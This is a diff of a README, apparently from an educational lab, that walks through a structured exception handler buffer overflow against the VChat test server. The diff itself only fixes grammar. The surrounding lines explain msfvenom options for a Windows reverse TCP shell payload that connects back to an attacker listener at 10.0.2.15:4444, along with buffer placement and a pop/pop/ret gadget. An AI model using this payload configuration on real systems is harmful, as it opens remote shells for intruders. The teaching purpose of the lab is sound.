xinwenfu/VChat_GMON_SEH/README.md

       * `-p windows/shell_reverse_tcp`: Specify we are using the tcp reverse shell payload for Windows.
 	  * `LHOST=10.0.2.15`: Specify the Listening Host's IP (IP of Attacker).
       * `LPORT=4444`: Specify the Listening port (Port Attacker Listens on).
-      * `EXITFUNC=thread`: Exit process, this is running as a seh based exploit.
+      * `EXITFUNC=thread`: Exit process, this is running as a seh-based exploit.
       * `-f python`: Format the output for use in a python program.
-      * `-v SHELL`: Specify SHELL variable.
+      * `-v SHELL`: Specify SHELL as the variable name.
       * `-b '\x00'`: Set bad characters.

 2. Create the byte array representing the shellcode as done in [exploit6.py](./SourceCode/exploit6.py).
 Remember this should be placed at the start of the buffer!
-3. Now lets see how the program reacts!
+3. Now, let's see how the program reacts!
    1. Observe the exploit hitting the `pop/pop/ret` gadget after passing the exception to the program.

 	   <img src="Images/I27.png" width=600>